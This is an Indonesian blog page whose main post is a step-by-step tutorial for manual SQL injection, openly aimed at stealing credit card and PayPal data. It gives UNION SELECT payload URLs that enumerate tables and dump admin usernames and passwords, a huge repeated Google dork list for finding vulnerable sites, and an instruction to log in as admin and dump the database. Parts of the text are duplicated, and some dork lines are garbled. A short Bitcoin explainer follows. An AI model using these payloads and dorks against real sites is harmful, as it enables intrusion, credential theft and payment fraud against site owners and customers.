Showing posts with label Underground. Show all posts
Tutorial]cara mencari CC atau akun paypal dengan SQL INJECTION Manual
SQL Injection merupakan sebuah teknik hacking dimana seorang
penyerang dapat meng insert perintah-perintah SQL melalui url untuk
dieksekusi oleh database. Penyebab utama dari celah ini adalah variable
yang kurang di filter : id=$id;……. > Got Error
Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url
Dork list:
Apabila terlihat pesan error seperti ini :
Nah kita mengetahui kalau kolom ke 7 itu Error artinya Website hanya memiliki 6 Kolom karena pada kolom nomor 7 sudah tidak ada hubungannya dengan kolom yang lainnya.
Jika kita membuka kolom yang Error maka terlihat seperti ini:
Lalu selanjutnya kita gunakan perintah fungsi union untuk menampilkan area kolom yang vuln . Gunakan perintah "Union Select" tanpa tanda petik.
caranya, ganti kata "order by" menjadi "Union Select", lalu setelah "id=" kita tambahkan saja tanda (-) gak pake tanda kurung lalu jika error tepat pada angka yg vuln (contoh angka 7) maka kalian urutkan dari angka 1 sampai 6 karena angka 7 Error.
Terlihat seperti ini:
maksudnya begini, area kolom yang vuln itu adalah nomor yang barusan kita buat lalu terpampang di website . Jadi begini, kalian sudah mencari vuln dengan urutan 1,2,3,4,5,6 . maka dari urutan 1,2,3,4,5,6 pasti akan terpampang salah satu nomor tersebut di website.
Next setelah itu kita akan mencoba Cek Versi MYSQL yang digunakan
untuk mengetahui versi mysql kita gunakan "@@version" atau "version()" tanpa tanda petik.Dari hasil sebelumnya, sekarang kita gunakan untuk mengecek versi mysql, caranya ikuti langkah berikut. Misalkan kolom yang vuln yang tampil adalah nomor 4 maka ganti saja kolom 4 dengan "@@version" sehingga urlnya menjadi:
Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah "@@version" dengan "group_concat(table_name)" dan menambahkan perintah "from information_schema.tables where table_schema=database()" sesudah angka terakhir , sebelum tanda --
Contohnya begini:
misalnya terlihat ada table admin, research, vcounter
maka kita akan memproses table admin sehingga kita mendapatkan Username dan Passwordnya, tetapi sayangnya, tidak semua website langsung menampakkan Table admin,tapi kalian bisa cari disatu-satu table yang muncul disite kalian.
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut. Cara mengganti perintah "group_concat(table_name)" dengan perintah "group_concat(column_name)" dan mengganti perintah "information_schema.tables" menjadi "information_schema.columns" juga mengganti perintah "table_schema=database()" dengan perintah "table_name=" lalu menambahkan nama tablenya tapi yg sudah di convert menjadi hex sesudah tanda (=) tanpa tanda kurung dan diawali dengan 0x . Ini website untuk convert Text menjadi Hex
Contohnya begini:
Admin < Ini Text
lalu di convert ke Hex dan tambahkan "0x" diawal maka jadilah
Admin(text) -> 61646d696e(hex) -> 0x61646d696e(table)
nah jadi terlihat link seperti ini:
Oke selanjutnya cara mengeluarkan data column,caranya cukup gampang
kalian tinggal mengganti "group_concat(column_name)" menjadi "group_concat(admin_id,0x3a,admin_pass)" lalu ganti "information_schema.columns where table_name=CODEHEX--" menjadi "admin"
Question : mengapa saya masukkan admin_id,0x3a,admin_pass dan apa maksud dari 0x3a lalu kenapa "information_schema.columns where table_name=CODEHEX" diganti menjadi "admin"?
Answer : karena admin_id dan admin_pass adalah nama kolom pada tabel Admin yang barusan saya convert ke Hex.
kalau 0x3a itu sebenarnya Code jika kita convert ke hex itu artinya (:) titik dua. saya menggantinya karena perintah itu tidak digunakan lagi karena kita sudah menemukan Tabel dan Kolomnya dan makanya saya hapus Information_schema.columns... dan menggantinya menjadi admin karena kita akan membongkar isi tabel tersebut.
WARNING:JANGAN SAMAKAN NAMA TABEL CONTOH INI DENGAN NAMA TABEL YANG SEDANG ANDA PRAKTEKKAN
Maka terlihat seperti ini:
contohnya seperti ini:
Setelah itu cari halaman login admin di website setelah itu loginkan username adminnya dan dump semua databasenya
Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url
Dork list:
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?av
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
inurl:”id=” & intext:”Warning: mysql_fetch_array()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: is_writable()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: Unknown()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: pg_exec()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: mysql_query()
inurl:”id=” & intext:”Warning: array_merge()
inurl:”id=” & intext:”Warning: preg_match()
inurl:”id=” & intext:”Warning: ilesize()
inurl:”id=” & intext:”Warning: filesize()
inurl:”id=” & intext:”Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
Quote:Contoh :
http://impgang dot com/news.php?id=14’
http://impgang dot com/news.php?id=’14
Apabila terlihat pesan error seperti ini :
Quote:You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1
Maka bisa dipastikan situs tersebut terdapat bug SQL Injection :D
Lalu lanjut lagi menentukan Jumlah Kolom
caranya :
Quote: http://www.site.com/news.php?id=7 order by 1-- || Gak Error
http://www.site.com/news.php?id=7 order by 2-- || Gak Error
http://www.site.com/news.php?id=7 order by 3-- || Gak Error
http://www.site.com/news.php?id=7 order by 4-- || Gak Error
http://www.site.com/news.php?id=7 order by 5-- || Gak Error
http://www.site.com/news.php?id=7 order by 6-- || Gak Error
http://www.site.com/news.php?id=7 order by 7-- || error
Nah kita mengetahui kalau kolom ke 7 itu Error artinya Website hanya memiliki 6 Kolom karena pada kolom nomor 7 sudah tidak ada hubungannya dengan kolom yang lainnya.
Jika kita membuka kolom yang Error maka terlihat seperti ini:
Quote:Unknown column '7' in 'order clause'
Lalu selanjutnya kita gunakan perintah fungsi union untuk menampilkan area kolom yang vuln . Gunakan perintah "Union Select" tanpa tanda petik.
caranya, ganti kata "order by" menjadi "Union Select", lalu setelah "id=" kita tambahkan saja tanda (-) gak pake tanda kurung lalu jika error tepat pada angka yg vuln (contoh angka 7) maka kalian urutkan dari angka 1 sampai 6 karena angka 7 Error.
Terlihat seperti ini:
Quote:Sebelumjika berhasil seharusnya kita bisa melihat area kolom yang vuln.
http://www.site.com/news.php?id=7 order by 6-- (Karena Angka 7 Error Maka di ganti menjadi 6)
Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,4,5,6--
maksudnya begini, area kolom yang vuln itu adalah nomor yang barusan kita buat lalu terpampang di website . Jadi begini, kalian sudah mencari vuln dengan urutan 1,2,3,4,5,6 . maka dari urutan 1,2,3,4,5,6 pasti akan terpampang salah satu nomor tersebut di website.
Next setelah itu kita akan mencoba Cek Versi MYSQL yang digunakan
untuk mengetahui versi mysql kita gunakan "@@version" atau "version()" tanpa tanda petik.Dari hasil sebelumnya, sekarang kita gunakan untuk mengecek versi mysql, caranya ikuti langkah berikut. Misalkan kolom yang vuln yang tampil adalah nomor 4 maka ganti saja kolom 4 dengan "@@version" sehingga urlnya menjadi:
Quote:SebelumSekarang kita bisa melihat versinya seperti 5.0.96 atau versi yang lainnya tetapi versi harus memiliki angka 5 didepannya.
http://www.site.com/news.php?id=-7 union select 1,2,3,4,5,6--
Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,@@version,5,6--
Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah "@@version" dengan "group_concat(table_name)" dan menambahkan perintah "from information_schema.tables where table_schema=database()" sesudah angka terakhir , sebelum tanda --
Contohnya begini:
Quote:SebelumNah terlihat ada nama table table di site yg kalian praktekkan
http://www.site.com/news.php?id=-7 union select 1,2,3,@@version,5,6--
Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
misalnya terlihat ada table admin, research, vcounter
maka kita akan memproses table admin sehingga kita mendapatkan Username dan Passwordnya, tetapi sayangnya, tidak semua website langsung menampakkan Table admin,tapi kalian bisa cari disatu-satu table yang muncul disite kalian.
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut. Cara mengganti perintah "group_concat(table_name)" dengan perintah "group_concat(column_name)" dan mengganti perintah "information_schema.tables" menjadi "information_schema.columns" juga mengganti perintah "table_schema=database()" dengan perintah "table_name=" lalu menambahkan nama tablenya tapi yg sudah di convert menjadi hex sesudah tanda (=) tanpa tanda kurung dan diawali dengan 0x . Ini website untuk convert Text menjadi Hex
Contohnya begini:
Admin < Ini Text
lalu di convert ke Hex dan tambahkan "0x" diawal maka jadilah
Admin(text) -> 61646d696e(hex) -> 0x61646d696e(table)
nah jadi terlihat link seperti ini:
Quote:Sebelumnah tiba-tiba muncul kolom id,admin_id,admin_pass pada tabel admin tadi.
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
Contoh Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=HASIL CONVERT TEXT KE HEX--
Note :HASIL CONVERT TEXT KE HEX yaitu hasil convert dari nama table yang barusan kalian Convert
Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x61646d696e--
Oke selanjutnya cara mengeluarkan data column,caranya cukup gampang
kalian tinggal mengganti "group_concat(column_name)" menjadi "group_concat(admin_id,0x3a,admin_pass)" lalu ganti "information_schema.columns where table_name=CODEHEX--" menjadi "admin"
Question : mengapa saya masukkan admin_id,0x3a,admin_pass dan apa maksud dari 0x3a lalu kenapa "information_schema.columns where table_name=CODEHEX" diganti menjadi "admin"?
Answer : karena admin_id dan admin_pass adalah nama kolom pada tabel Admin yang barusan saya convert ke Hex.
kalau 0x3a itu sebenarnya Code jika kita convert ke hex itu artinya (:) titik dua. saya menggantinya karena perintah itu tidak digunakan lagi karena kita sudah menemukan Tabel dan Kolomnya dan makanya saya hapus Information_schema.columns... dan menggantinya menjadi admin karena kita akan membongkar isi tabel tersebut.
WARNING:JANGAN SAMAKAN NAMA TABEL CONTOH INI DENGAN NAMA TABEL YANG SEDANG ANDA PRAKTEKKAN
Maka terlihat seperti ini:
Quote:SebelumAkhirnya berhasil.. kalian akan mendapatkan username dan password admin diwebsite yang barusan kalian praktekan
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x61646d696e--
Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(admin_id,0x3a,admin_pass),5,6 from admin--
contohnya seperti ini:
Setelah itu cari halaman login admin di website setelah itu loginkan username adminnya dan dump semua databasenya
Mengenal Bitcoin Dan Cara Mendapatkannya Secara Gratis
Bitcoin adalah sebuah uang elektronik yang di buat pada tahun 2009 oleh Satoshi Nakamoto. Nama tersebut juga dikaitkan dengan perangkat lunak open source yang dia rancang, dan juga menggunakan jaringan peer-to-peer yang menghubungkan semuanya. Tidak seperti mata uang pada umumnya, bitcoin tidak tergantung dengan mempercayai penerbit utama. Bitcoin menggunakan sebuah database yang didistribusikan dan menyebar ke node - node dari sebuah jaringan P2P ke jurnal transaksi, dan menggunakan kriptografi untuk menyediakan fungsi - fungsi keamanan dasar, seperti memastikan bahwa bitcoin - bitcoin hanya dapat di habiskan oleh orang mempunyainya, dan tidak boleh dilakukan lebih dari satu kali.
Desain dari Bitcoin memperbolehkan untuk kepemilikan tanpa identitas (anonymous) dan pemindahan kekayaan. Bitcoin - bitcoin dapat di simpan di komputer pribadi dalam sebuah format file wallet atau di simpan oleh sebuah servis wallet pihak ketiga, dan terlepas dari semua itu Bitcoin - bitcoin dapat di kirim lewat internet kepada siapapun yang mempunyai sebuah alamat Bitcoin. Topologi peer-to-peer bitcoin dan kurangnya administrasi tunggal membuatnya tidak mungkin untuk otoritas, pemerintahan apapun, untuk memanipulasi nilai dari bitcoin - bitcoin atau menyebabkan inflasi dengan memproduksi lebih banyak bitcoin.
Singkatnya bitcoin adalah mata uang elektronik yang didasari oleh teknologi yang paling baru dan mulai menjadi pilihan sebagai pengganti emas. Bitcoin sendiri dibuat dari gabungan berbagai teknologi dari cryptografi, ekonomi dan network membentuk sebuah program yang terdiri dari network peer-to-peer yang kokoh dan hampir mustahil untuk diserang, teknologi atau lebih tepatnya mata uang baru ini disebut cryptocurrency. Bitcoin ini pada akhirnya berfungsi sebagai mata uang.
Berdasarkan DailyDotCom penggunaan Bitcoin atau mata uang cryptografi ini terus meningkat drastis. Tahun 2012 lalu titik transaksi tertinggi berhasil diraih dengan transaksi mencapai 58.000 per hari. Sekarang setelah tahun baru transaksi Bitcoin terus stabil pada titik 50.000 transaksi per harinya. Pengguna internet terus antusias menggunakan bitcoin sebagai mata uang internet yang sepenuhnya bersifat digital. Bahkan perusahaan raksasa seperti Wordpress sekarang menerima mata uang bitcoin dalam penyediaan jasanya. Berdasarkan Forbes bitcoin menjadi alternatif mata uang yang populer karena kemudahannya dalam penggunaannya, sistem yang terdesentralisasi dan akses yang tersedia untuk semua orang menjadi daya tarik utama dalam mata uang ini.
